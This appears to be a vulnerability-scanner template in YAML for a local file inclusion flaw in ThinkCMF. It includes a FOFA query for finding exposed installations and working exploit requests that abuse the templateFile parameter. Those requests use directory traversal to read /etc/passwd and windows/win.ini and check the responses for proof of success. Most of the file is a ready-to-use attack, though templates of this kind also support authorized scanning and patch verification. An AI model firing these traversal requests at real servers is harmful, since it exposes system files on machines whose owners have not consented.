product: ThinkCMF
vName: ThinkCMF Local File Inclusion
type: 文件读取
vID: [ ]
level: 3
vDesc: ThinkCMF is vulnerable to local file inclusion.
version: ''
note: ''
search:
  FOFA: app="ThinkCMF"
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: or
exploit:
  - exp:
      method: get
      follow: false
      path: /?a=display&templateFile=README.md
    verify:
      logic: and
      check:
        - body:
            value:
              - ThinkCMF
            logic: and
        - status: 200
  - exp:
      method: get
      follow: false
      path: /?a=display&templateFile=../../../../../../../../../../../../../../../../etc/passwd
    verify:
      logic: and
      check:
        - body:
            value:
              - 'root:x:0'
            logic: and
        - status: 200
  - exp:
      method: get
      follow: false
      path: /?a=display&templateFile=../../../../../../../../../../../../../../../../windows/win.ini
    verify:
      logic: and
      check:
        - body:
            value:
              - for 16-bit app support
            logic: and
        - status: 200